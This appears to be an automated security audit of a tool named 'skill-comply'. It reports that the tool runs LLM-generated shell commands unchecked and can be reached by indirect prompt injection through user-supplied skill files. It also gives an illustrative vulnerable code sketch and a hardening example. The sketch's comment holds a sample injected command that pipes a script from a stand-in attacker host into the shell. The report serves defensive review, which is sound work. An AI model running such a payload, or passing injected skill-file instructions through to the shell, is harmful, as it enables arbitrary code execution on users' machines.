skill-comply
Fail
Audited by Gen Agent Trust Hub on Mar 23, 2026
Risk Level: HIGH
Risk Categories: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The script `scripts/runner.py` iterates through a list of `setup_commands` and executes them using `subprocess.run`. These commands are parsed directly from LLM output generated during the scenario-creation phase.
- [REMOTE_CODE_EXECUTION]: The `setup_commands` executed in `scripts/runner.py` are dynamically generated by an LLM in `scripts/scenario_generator.py`. Because the tool does not validate or sanitize these commands before execution, it can run arbitrary shell commands supplied by the AI model. The risk is particularly high because the LLM is prompted with potentially untrusted skill files provided by the user.
- [PROMPT_INJECTION]: The tool is vulnerable to indirect prompt injection because it incorporates external skill-file content directly into the prompts used for specification and scenario generation.
  - Ingestion points: Skill files provided as command-line arguments are read and interpolated into prompt templates in `scripts/spec_generator.py` and `scripts/scenario_generator.py`.
  - Boundary markers: The skill content is wrapped in triple-dash (`---`) delimiters in the prompt templates, which may not be sufficient to prevent instructions in the skill file from escaping the intended context.
  - Capability inventory: The tool can execute shell commands via `subprocess.run` in `scripts/runner.py` based on LLM output.
  - Sanitization: No validation, sanitization, or filtering is performed on the input skill content or on the resulting LLM-generated setup commands.
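The execution path flagged above can be illustrated with a minimal sketch. The function name and structure here are hypothetical and not taken from `scripts/runner.py`; it only demonstrates why passing raw model output to `subprocess.run` with `shell=True` is dangerous:

```python
import subprocess

def run_setup_commands(setup_commands):
    """Execute each command string via the shell (the vulnerable pattern)."""
    results = []
    for cmd in setup_commands:
        # shell=True hands the raw string to /bin/sh, so a malicious model
        # output such as "true; curl evil.example | sh" would run both
        # the expected command and the injected one.
        results.append(
            subprocess.run(cmd, shell=True, capture_output=True, text=True)
        )
    return results

# Benign demonstration: the second string shows how "; " chains an
# extra command the caller never intended to run.
out = run_setup_commands(["echo setup", "echo ok; echo injected"])
print([r.stdout.strip() for r in out])
```

Because the shell interprets metacharacters (`;`, `|`, `$(...)`, backticks), any prompt-injection payload that reaches `setup_commands` becomes arbitrary code execution.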
Recommendations
- The AI audit detected serious security threats (command execution, remote code execution, and prompt injection); see the Full Analysis above.
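One concrete hardening step for the pattern flagged in this audit is to validate LLM-generated commands before execution: reject shell metacharacters, parse the string into an argv list, and check the binary against an allowlist so the command can run with `shell=False`. This is a sketch; the allowlist contents and the helper name are assumptions, not part of the audited tool:

```python
import shlex

# Hypothetical allowlist -- a real deployment would tailor this to the
# setup commands the tool legitimately needs.
ALLOWED_BINARIES = {"pip", "npm", "mkdir", "touch"}
SHELL_METACHARACTERS = set(";|&`$><\n")

def validate_setup_command(cmd: str) -> list[str]:
    """Return an argv list safe for subprocess.run(argv, shell=False).

    Raises ValueError if the command contains shell metacharacters or
    invokes a binary outside the allowlist.
    """
    if any(ch in SHELL_METACHARACTERS for ch in cmd):
        raise ValueError(f"shell metacharacter in command: {cmd!r}")
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise ValueError(f"binary not allowlisted: {cmd!r}")
    return argv
```

Running the validated argv with `shell=False` means no shell ever parses the model's output, which closes the injection channel even if a hostile skill file manipulates the generated commands.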